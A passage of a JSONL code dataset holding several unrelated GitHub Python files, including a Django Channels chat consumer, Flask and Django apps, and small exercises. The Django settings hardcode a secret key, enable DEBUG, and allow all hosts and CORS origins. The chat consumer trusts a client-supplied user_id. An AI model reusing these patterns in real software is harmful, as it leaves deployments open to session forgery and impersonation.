sorted([x0, x1])\n ymin, ymax = sorted([y0, y1])\n plt.xlim(xmin, xmax)\n plt.ylim(ymin, ymax)\n\ntellme(\"All Done!\")\nplt.show()\n\"\"\"\n","repo_name":"shvamabps/Interest-Calculator","sub_path":"ploting.py","file_name":"ploting.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19473646650","text":"class CashRegister :\n def __init__(self) :\n self._itemCount = 0\n self._totalPrice = 0.0\n def addItem(self, price) :\n self._itemCount = self._itemCount + 1\n self._totalPrice = self._totalPrice + price \n def getTotal(self) :\n return self._totalPrice \n def getCount(self) :\n return self._itemCount\n def clear(self) :\n self._itemCount = 0\n self._totalPrice = 0.0\n\n#method implementation giveChange(self, payment)\n def giveChange(self, payment):\n if payment == self._totalPrice:\n print(\"Thank You For Shopping: \")\n return 0\n if payment > self._totalPrice:\n print(\"Give change: \")\n return payment - self._totalPrice\n if payment < self._totalPrice:\n print(\"Please , you need to pay extra £: \")\n return payment - self._totalPrice \n#customer 1\nregister1 = CashRegister()\nregister1.addItem(0.90)\nregister1.addItem(0.95)\n# customer 2\nregister2 = CashRegister()\nregister2.addItem(1.90)\n\nprint(\"Customer has to pay: £\",register1.getTotal())\nprint(\"Customer has bought : \",register1.getCount() , \"products\")\n#test1 customer hands more than total, requires change \nprint(register1.giveChange(20))#assuming that customer handed £20\nprint()\nprint(\"Customer has to pay: £\",register2.getTotal())\nprint(\"Customer has bought :\",register2.getCount() , \"product\")\nprint(register1.giveChange(50))#assuming that customer handed £50\n\n\n#test2 customer hands less than total needs to be aksed for more money\n#print(\"%.2f\" % register1.giveChange(1.5))#assuming that customer handed £1.5\n#test3 customer gives exactly total amount , no further action required.\n#print(register1.giveChange(1.85))#assuming that customer handed exactly £1.85\n\n\n\n","repo_name":"lw6c/IntroSoftDevel","sub_path":"session10/s10_task_3d.py","file_name":"s10_task_3d.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74615010832","text":"import json\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom .models.roomchat import Message, Room, RoomMember\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_number_id = self.scope[\"url_route\"][\"kwargs\"][\"room_number_id\"]\n self.room_group_name = \"chat_%s\" % self.room_number_id\n\n # Join room group\n try:\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n except Exception as ex:\n print(ex)\n try:\n room_member = RoomMember.objects.get(\n room__room_number=self.room_number_id, member=self.scope[\"user\"]\n )\n room_member.is_online = True\n room_member.save()\n except Exception as ex:\n print(ex)\n online_room_member_names = list(\n RoomMember.objects.filter(\n room__room_number=self.room_number_id, is_online=True\n ).values_list(\"member__first_name\", flat=True)\n )\n\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"new_user_join_signal\",\n \"room_number\": str(room_member.room.room_number),\n \"room_member_id\": room_member.id,\n \"online_room_member_names\": online_room_member_names,\n },\n )\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room group\n try:\n room_member = RoomMember.objects.get(\n room__room_number=self.room_number_id, member=self.scope[\"user\"]\n )\n room_member.is_online = False\n room_member.save()\n except Exception as ex:\n print(ex)\n\n online_room_member_names = list(\n RoomMember.objects.filter(\n room__room_number=self.room_number_id, is_online=True\n ).values_list(\"member__first_name\", flat=True)\n )\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"send_user_offline_signal\",\n \"room_number\": str(room_member.room.room_number),\n \"room_member_id\": room_member.id,\n \"online_room_member_names\": online_room_member_names,\n },\n )\n except Exception as ex:\n print(ex)\n\n try:\n await self.channel_layer.group_discard(\n self.room_group_name, self.channel_name\n )\n except Exception as ex:\n print(ex)\n\n # Receive message from WebSocket\n async def receive(self, text_data):\n text_data_json = json.loads(text_data)\n\n message_type = text_data_json.get(\"type\")\n\n if message_type == \"chat_message\":\n message = text_data_json.get(\"message\")\n user_id = text_data_json.get(\"user_id\")\n message = await self.create_message(message, self.room_number_id, user_id)\n\n # Send message to room group\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"chat_message\",\n \"message\": message.message,\n \"message_id\": message.id,\n \"room_member_id\": message.room_member.id,\n \"room_member_image_src\": message.room_member.member.image.url,\n \"room_member_first_name\": message.room_member.member.first_name,\n \"user_id\": message.room_member.member.id,\n },\n )\n except Exception as ex:\n print(ex)\n\n elif message_type == \"read_message_signal\":\n room_number = text_data_json.get(\"room_number\")\n user_id = text_data_json.get(\"user_id\")\n try:\n room = Room.objects.get(room_number=room_number)\n room_member = RoomMember.objects.get(member__id=user_id, room=room)\n [\n message.reader.add(room_member)\n for message in Message.objects.filter(room_member__room=room)\n ]\n except Exception as ex:\n print(ex)\n\n elif message_type == \"invite_member\":\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {**text_data_json, \"sender\": self.scope[\"user\"].id},\n )\n except Exception as ex:\n print(ex)\n\n # Receive message from room group\n\n async def chat_message(self, event):\n # Send message to WebSocket\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def send_user_offline_signal(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def new_user_join_signal(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def file_upload(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def invite_member(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n @database_sync_to_async\n def create_message(self, message, room_number_id, user_id):\n try:\n room_member = RoomMember.objects.get(\n member__id=user_id, room__room_number=room_number_id\n )\n message = Message.objects.create(message=message, room_member=room_member)\n message.reader.add(room_member)\n return message\n except Exception as ex:\n print(ex)\n return False\n\n\nclass ProtectedConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user_id = self.scope[\"url_route\"][\"kwargs\"][\"user_id\"]\n self.room_group_name = \"protected_%s\" % str(self.user_id)\n\n try:\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n except Exception as ex:\n print(ex)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"disconnect_success\",\n \"room_group_name\": self.room_group_name,\n },\n )\n except Exception as ex:\n print(ex)\n\n async def receive(self, text_data):\n text_data = json.loads(text_data)\n # message_type = text_data[\"type\"]\n\n # new connection handler\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"connection_success\",\n },\n )\n except Exception as ex:\n print(ex)\n\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"update_discussion\",\n },\n )\n except Exception as ex:\n print(ex)\n\n async def connection_success(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def update_discussion(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n","repo_name":"harshilsuthar/videochat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18961459731","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, request, Response, render_template\nimport csv\nimport json\nimport os\nimport re\n\nfrom zips import ZIPS_TO_LNG_LAT\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/submit', methods=['POST'])\ndef success():\n all_zips = request.form['zips'].split(\"\\n\")\n heat_map = {}\n for zipcode in all_zips:\n try:\n formatted_zipcode = str(int(zipcode)).zfill(5)\n except ValueError:\n continue\n\n if not formatted_zipcode in ZIPS_TO_LNG_LAT:\n continue\n\n if not formatted_zipcode in heat_map:\n heat_map[formatted_zipcode] = {'count': 0, 'lnglat': ZIPS_TO_LNG_LAT[formatted_zipcode]}\n\n heat_map[formatted_zipcode]['count'] += 1\n\n context = {'heat_map': heat_map,\n 'radius': request.form['radius'],\n 'max_opacity': request.form['max_opacity'] }\n\n return render_template('map.html', **context)\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.debug = port == 5000\n app.run(host='0.0.0.0', port=port)","repo_name":"Bernie-2016/ZipToHeatmaps","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34217555481","text":"# 小A 和 小B 在玩猜数字。小B 每次从 1, 2, 3 中随机选择一个,小A 每次也从 1, 2, 3 中选择一个猜。他们一共进行三次这个游戏,请返回 小A 猜对了几次?\n#\n#  \n#\n# 输入的guess数组为 小A 每次的猜测,answer数组为 小B 每次的选择。guess和answer的长度都等于3。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/guess-numbers\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n# 示例 1:\n#\n# 输入:guess = [1,2,3], answer = [1,2,3]\n# 输出:3\n# 解释:小A 每次都猜对了。\n#  \n#\n# 示例 2:\n#\n# 输入:guess = [2,2,3], answer = [3,2,1]\n# 输出:1\n# 解释:小A 只猜对了第二次。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/guess-numbers\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\ndef game(guess, answer):\n \"\"\"\n :type guess: List[int]\n :type answer: List[int]\n :rtype: int\n \"\"\"\n num = 0\n for i in range(0,len(guess)):\n if(guess[i] == answer[i]):\n num = num+1\n return num\n\nif __name__ == '__main__':\n guess = [2, 2, 3]\n answer = [3, 2, 1]\n print(game(guess,answer))\n","repo_name":"RandySarah/LeetCode","sub_path":"array/guess-numbers.py","file_name":"guess-numbers.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12798669890","text":"import alsaaudio, wave, numpy\nimport os\n\n\nclass Recorder:\n def __init__(self):\n pass\n\n def __data_to_record(self, sampling_rate=8000, period_size=256, wav_title=\"record.wav\"):\n self.__inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE)\n self.__inp.setchannels(1)\n self.__inp.setrate(sampling_rate)\n self.__inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n self.__inp.setperiodsize(period_size)\n\n self.__w = wave.open(wav_title, 'w')\n self.__w.setnchannels(1)\n self.__w.setsampwidth(2)\n self.__w.setframerate(sampling_rate)\n\n def record(self, time_to_run=2, args=[]):\n if len(args) > 1:\n self.__data_to_record(wav_title=str(args[2]) + \".wav\")\n else:\n self.__data_to_record()\n\n beginning = os.times()[4]\n while beginning + time_to_run > os.times()[4]:\n l, data = self.__inp.read()\n a = numpy.fromstring(data, dtype='int16')\n self.__w.writeframes(data)\n\n print(\"_time elapsed: \" + str(os.times()[4] - beginning) + \" seconds\")\n","repo_name":"wsacin/speech-recognition","sub_path":"Recorder.py","file_name":"Recorder.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"14575503578","text":"# -*- coding: UTF-8 -*-\n\nimport re\nimport requests\nimport codecs\nimport sys\nimport imghdr\nimport os\nimport uuid\n\n\ndef get_md_str(file_name):\n f = codecs.open(file_name, 'r', 'utf-8')\n return f.read()\n\n\ndef get_urls_in_md(md_str):\n pattern = re.compile(r'!\\[(.*?)\\]\\((.*?)\\)')\n iters = pattern.finditer(md_str)\n return iters\n\n\ndef get_img(url):\n resp = requests.get(url)\n if resp.ok:\n return resp.content\n else:\n return None\n\n\ndef write_to_file(img, file_name):\n with open(file_name, 'wb') as f:\n f.write(img)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print('usage: download_img_in_md.py input_md_file_path output_img_dir_path')\n exit(-1)\n else:\n input_md_file_path = sys.argv[1]\n output_img_dir_path = sys.argv[2]\n print(\"input md file: \"+input_md_file_path)\n md_str = get_md_str(input_md_file_path)\n url_iters = get_urls_in_md(md_str)\n for url_iter in url_iters:\n print(\"\\tfound: \"+url_iter.group(0))\n img_name = url_iter.group(1).strip()\n img_url = url_iter.group(2).split(' ')[0].strip()\n img_data = get_img(img_url)\n img_format = imghdr.what('', h=img_data)\n img_file_path = os.path.join(\n output_img_dir_path, img_name+'.'+img_format)\n if len(img_name) == 0 or os.path.exists(img_file_path):\n img_file_path = os.path.join(\n output_img_dir_path, img_name+'('+str(uuid.uuid1())+')'+'.'+img_format)\n write_to_file(img_data, img_file_path)\n print(\"\\t\\twrote to: \"+img_file_path)\n","repo_name":"CleverWang/Blogs","sub_path":"download_img_in_md.py","file_name":"download_img_in_md.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71313088910","text":"from bs4 import BeautifulSoup\n\nbase_url = 'https://comoquiero.net'\nfood_list = open('list.html', encoding='utf8')\n\ndef read_list_item(list_file):\n line = list_file.readline().strip('\\n')\n item = ''\n while line != '':\n line = list_file.readline().strip('\\n')\n if ' 1:\r\n # probs = F.softmax(output, dim=1)\r\n # probs = torch.argmax(probs, dim=1).float()\r\n # else:\r\n # probs = torch.sigmoid(output)\r\n\r\n # probs = probs.squeeze(0)\r\n\r\n # tf = transforms.Compose(\r\n # [\r\n # transforms.ToPILImage(),\r\n # transforms.Resize(full_img.size[1]),\r\n # transforms.ToTensor()\r\n # ]\r\n # )\r\n\r\n # probs = tf(probs.cpu())\r\n # full_mask = probs.squeeze().cpu().numpy()\r\n \r\n # if net.n_classes > 1:\r\n # final_mask = full_mask\r\n # else:\r\n # final_mask = full_mask > out_threshold\r\n\r\n # return final_mask\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(description=\"PyTorch DeeplabV3Plus Training\")\r\n parser.add_argument('--backbone', type=str, default='resnet',\r\n choices=['resnet', 'xception', 'drn', 'mobilenet'],\r\n help='backbone name (default: resnet)')\r\n parser.add_argument('--out-stride', type=int, default=16,\r\n help='network output stride (default: 8)')\r\n parser.add_argument('--dataset', type=str, default='tables',\r\n choices=['tables', 'pascal', 'coco', 'cityscapes'],\r\n help='dataset name (default: tables)')\r\n parser.add_argument('--use-sbd', action='store_true', default=False,\r\n help='whether to use SBD dataset (default: False)')\r\n parser.add_argument('--workers', type=int, default=4,\r\n metavar='N', help='dataloader threads')\r\n parser.add_argument('--base-size', type=int, default=513,\r\n help='base image size')\r\n parser.add_argument('--crop-size', type=int, default=513,\r\n help='crop image size')\r\n parser.add_argument('--sync-bn', type=bool, default=None,\r\n help='whether to use sync bn (default: auto)')\r\n parser.add_argument('--freeze-bn', type=bool, default=False,\r\n help='whether to freeze bn parameters (default: False)')\r\n parser.add_argument('--loss-type', type=str, default='ce',\r\n choices=['ce', 'focal'],\r\n help='loss func type (default: ce)')\r\n # training hyper params\r\n parser.add_argument('--epochs', type=int, default=None, metavar='N',\r\n help='number of epochs to train (default: auto)')\r\n parser.add_argument('--start_epoch', type=int, default=0,\r\n metavar='N', help='start epochs (default:0)')\r\n parser.add_argument('--batch-size', type=int, default=None,\r\n metavar='N', help='input batch size for \\\r\n training (default: auto)')\r\n parser.add_argument('--test-batch-size', type=int, default=None,\r\n metavar='N', help='input batch size for \\\r\n testing (default: auto)')\r\n parser.add_argument('--use-balanced-weights', action='store_true', default=False,\r\n help='whether to use balanced weights (default: False)')\r\n # optimizer params\r\n parser.add_argument('--lr', type=float, default=None, metavar='LR',\r\n help='learning rate (default: auto)')\r\n parser.add_argument('--lr-scheduler', type=str, default='poly',\r\n choices=['poly', 'step', 'cos'],\r\n help='lr scheduler mode: (default: poly)')\r\n parser.add_argument('--momentum', type=float, default=0.9,\r\n metavar='M', help='momentum (default: 0.9)')\r\n parser.add_argument('--weight-decay', type=float, default=5e-4,\r\n metavar='M', help='w-decay (default: 5e-4)')\r\n parser.add_argument('--nesterov', action='store_true', default=False,\r\n help='whether use nesterov (default: False)')\r\n # cuda, seed and logging\r\n parser.add_argument('--no-cuda', action='store_true', default=\r\n False, help='disables CUDA training')\r\n parser.add_argument('--gpu-ids', type=str, default='0',\r\n help='use which gpu to train, must be a \\\r\n comma-separated list of integers only (default=0)')\r\n parser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\n # checking point\r\n parser.add_argument('--resume', type=str, default=None,\r\n help='put the path to resuming file if needed')\r\n parser.add_argument('--checkname', type=str, default=None,\r\n help='set the checkpoint name')\r\n # finetuning pre-trained models\r\n parser.add_argument('--ft', action='store_true', default=False,\r\n help='finetuning on a different dataset')\r\n # evaluation option\r\n parser.add_argument('--eval-interval', type=int, default=1,\r\n help='evaluuation interval (default: 1)')\r\n parser.add_argument('--no-val', action='store_true', default=False,\r\n help='skip validation during training')\r\n\r\n # for prediction\r\n parser.add_argument('--model', '-m', default='MODEL.pth',\r\n metavar='FILE',\r\n help=\"Specify the file in which the model is stored\")\r\n parser.add_argument('--input', '-i', metavar='INPUT', nargs='+',\r\n help='filenames of input images', required=True)\r\n\r\n parser.add_argument('--output', '-o', metavar='INPUT', nargs='+',\r\n help='Filenames of ouput images')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef get_output_filenames(args):\r\n in_files = args.input\r\n out_files = []\r\n\r\n if not args.output:\r\n for f in in_files:\r\n pathsplit = os.path.splitext(f)\r\n out_files.append(\"{}_OUT{}\".format(pathsplit[0], pathsplit[1]))\r\n elif len(in_files) != len(args.output):\r\n logging.error(\"Input files and output files are not of the same length\")\r\n raise SystemExit()\r\n else:\r\n out_files = args.output\r\n\r\n return out_files\r\n\r\n\r\ndef mask_to_image(mask):\r\n # return Image.fromarray((mask * 255).astype(np.uint8))\r\n return Image.fromarray((mask).astype(np.uint8))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = get_args()\r\n in_files = args.input\r\n out_files = get_output_filenames(args)\r\n \r\n ## number of target classes\r\n n_classes = 3\r\n # net = UNet(n_channels=3, n_classes=n_classes)\r\n # \r\n net = DeepLab(num_classes=n_classes,\r\n backbone=args.backbone,\r\n output_stride=args.out_stride,\r\n sync_bn=args.sync_bn,\r\n freeze_bn=args.freeze_bn)\r\n\r\n logging.info(\"Loading model {}\".format(args.model))\r\n\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n logging.info(f'Using device {device}')\r\n net.to(device=device)\r\n net.load_state_dict(torch.load(args.model, map_location=device))\r\n\r\n logging.info(\"Model loaded !\")\r\n\r\n for i, fn in enumerate(in_files):\r\n logging.info(\"\\nPredicting image {} ...\".format(fn))\r\n\r\n img = Image.open(fn)\r\n\r\n mask = predict_img(net=net,\r\n full_img=img,\r\n scale_factor=args.scale,\r\n out_threshold=args.mask_threshold,\r\n device=device)\r\n\r\n # if n_classes > 1:\r\n # mask = mask / n_classes\r\n \r\n print(type(mask))\r\n print(mask.shape)\r\n print(mask)\r\n\r\n if not args.no_save:\r\n out_fn = out_files[i]\r\n \r\n result = mask_to_image(mask)\r\n result.save(out_files[i])\r\n\r\n logging.info(\"Mask saved to {}\".format(out_files[i]))\r\n\r\n if args.viz:\r\n logging.info(\"Visualizing results for image {}, close to continue ...\".format(fn))\r\n plot_img_and_mask(img, mask)\r\n","repo_name":"hainan89/TableGraph","sub_path":"pytorch-deeplab-xception/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":8886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32403978915","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 12 12:26:00 2020\n\n@author: piaverous\n\"\"\"\n\nfrom .models import Match\nfrom psycopg2.extras import execute_values\n\nclass MatchDatabase(object):\n def __init__(self, db_conn):\n self.db_connection = db_conn\n\n \"\"\" Insert multiple matches.\n \n Args :\n matches = [(id, winner_id, loser_id, winner_side)] \n // List of tuples of matches -> (int, int, int, bool) or (int, int, int)\n // NB: if winner_side is not known, leave empty and it will be set to NULL\n // NBB: winner_id and loser_id are FKEYS to algos table, so this will fail \n // if you have not inserted the algos beforehand\n \"\"\"\n def insert_many(self, matches):\n if len(matches) == 0:\n return \n\n cur = self.db_connection.cursor()\n execute_values(\n cur,\n \"INSERT INTO matches (id, winner_id, loser_id, winner_side, date) VALUES %s\",\n map(lambda x: x if len(x) == 5 else (x[0], x[1], x[2], None, x[3]), matches)\n )\n self.db_connection.commit()\n cur.close()\n\n\n \"\"\" Gets all matches in the DB. \"\"\"\n def find_all(self):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT * FROM matches m WHERE NOT m.crashed\")\n matches = cur.fetchall()\n cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets all match ids in the DB. \"\"\"\n def find_all_ids(self):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT id FROM matches m WHERE NOT m.crashed\")\n matches = cur.fetchall()\n cur.close()\n return list(map(lambda x: x[0], matches))\n\n \n \"\"\" Gets all matches played by a given algo. \n \n Args :\n algo_id // The ID of the algo for whom you wish to see the matches.\n \"\"\"\n def find_for_algo(self, algo_id):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT * FROM matches m WHERE m.winner_id=%s OR m.loser_id=%s AND NOT m.crashed\", (algo_id, algo_id))\n matches = cur.fetchall()\n cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets all matches played by all algos of a given user. \n \n Arg\n username \n \"\"\"\n def find_for_user(self, username):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT m.* FROM matches m, algos a WHERE (m.winner_id=a.id OR m.loser_id=a.id) AND a.username=%s AND NOT m.crashed\", (username,))\n matches = cur.fetchall()\n cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets the IDS of all the matches played by a given algo. \n \n Args :\n algo_id // The ID of the algo for whom you wish to see the matches.\n \"\"\"\n def find_ids_for_algo(self, algo_id):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT id FROM matches m WHERE m.winner_id=%s OR m.loser_id=%s AND NOT m.crashed\", (algo_id, algo_id))\n matches = cur.fetchall()\n cur.close()\n return list(map(lambda x: x[0], matches))\n\n \n \"\"\" Updates a match.\n \n Args :\n match // A Match object\n \"\"\"\n def update_match(self, match):\n cur = self.db_connection.cursor()\n cur.execute(\n \"UPDATE matches m SET winner_id=%s, loser_id=%s, winner_side=%s, crashed=%s, date=%s WHERE m.id=%s\", \n (match.winner_id, match.loser_id, match.winner_side, match.crashed, match.date, match.id)\n )\n self.db_connection.commit()\n cur.close()\n \n","repo_name":"EtWnn/AlphaTerminal","sub_path":"tables/database/matchDatabase.py","file_name":"matchDatabase.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2842032851","text":"import os\nfrom pathlib import Path\nfrom datetime import timedelta\nimport environ\nfrom celery.schedules import crontab\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nSECRET_KEY = 'django-insecure-tecs=e2gh(szkng+pps5(jau58i5q-kv&al8d^7#m_4sj!lemk'\n\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\nenv = environ.Env()\nenviron.Env.read_env()\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'app',\n 'django_filters',\n 'django_elasticsearch_dsl',\n 'django_elasticsearch_dsl_drf',\n 'storages',\n 'corsheaders',\n\n\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ],\n\n}\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=50),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': False,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n 'JWK_URL': None,\n 'LEEWAY': 0,\n\n 'AUTH_HEADER_TYPES': ('Bearer',),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n 'USER_AUTHENTICATION_RULE': 'rest_framework_simplejwt.authentication.default_user_authentication_rule',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n 'TOKEN_USER_CLASS': 'rest_framework_simplejwt.models.TokenUser',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=30),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\n]\n\nROOT_URLCONF = 'iRating.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'iRating.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': os.environ.get('POSTGRES_ENGINE'),\n 'NAME': os.environ.get('POSTGRES_DATABASE'),\n 'USER': os.environ.get('POSTGRES_USER'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),\n 'HOST': os.environ.get('POSTGRES_HOST'),\n 'PORT': os.environ.get('POSTGRES_PORT'),\n }\n}\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n )\n}\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_TZ = True\n\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# AWS_ACCESS_KEY_ID = env('AWS_ACCESS_KEY_ID')\n# AWS_SECRET_ACCESS_KEY = env('AWS_SECRET_ACCESS_KEY')\n# AWS_STORAGE_BUCKET_NAME = env('AWS_STORAGE_BUCKET_NAME')\n# AWS_S3_OBJECT_PARAMETERS = {'CacheControl': 'max-age=86400'}\n# AWS_CUSTOM_DOMAIN = env('AWS_CUSTOM_DOMAIN')\n# AWS_S3_FILE_OVERWRITE = True\n\n# DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\n# STATIC_FILE_STORAGE = 'storages.backends.s3boto3.S3StaticStorage'\n\n\nSTATIC_URL = 'static/'\nMEDIA_URL = 'media/'\n\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nCELERY_BROKER_URL = os.environ.get(\"CELERY_BROKER\", \"amqp://guest@rabbitmq//\")\nCELERY_RESULT_BACKEND = os.environ.get(\"CELERY_BACKEND\", \"redis://redis:6379/0\")\n\nELASTICSEARCH_DSL = {\n 'default': {\n 'hosts': 'elasticsearch',\n 'size': 1000,\n }\n}\n\nCORS_ALLOW_ALL_ORIGINS = True\n\n# CELERY_BEAT_SCHEDULE = {\n# \"web_srap_ifood\": {\n# \"task\": \"web_scrap_ifood\",\n# \"schedule\": crontab(hour='*/24')\n# }}\n","repo_name":"Vitor-Roma/iRating","sub_path":"iRating/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25898558159","text":"import time\nimport math\n\ndef zamanHesap(fonk):\n def icFonk(*args,**kwargs):\n begin = time.time()\n fonk(*args,**kwargs)\n end = time.time()\n print(\"bu işlem sırasında geçen zaman:\",fonk.__name__,end-begin)\n\n return icFonk\n\n@zamanHesap\ndef Faktoriyel(param):\n 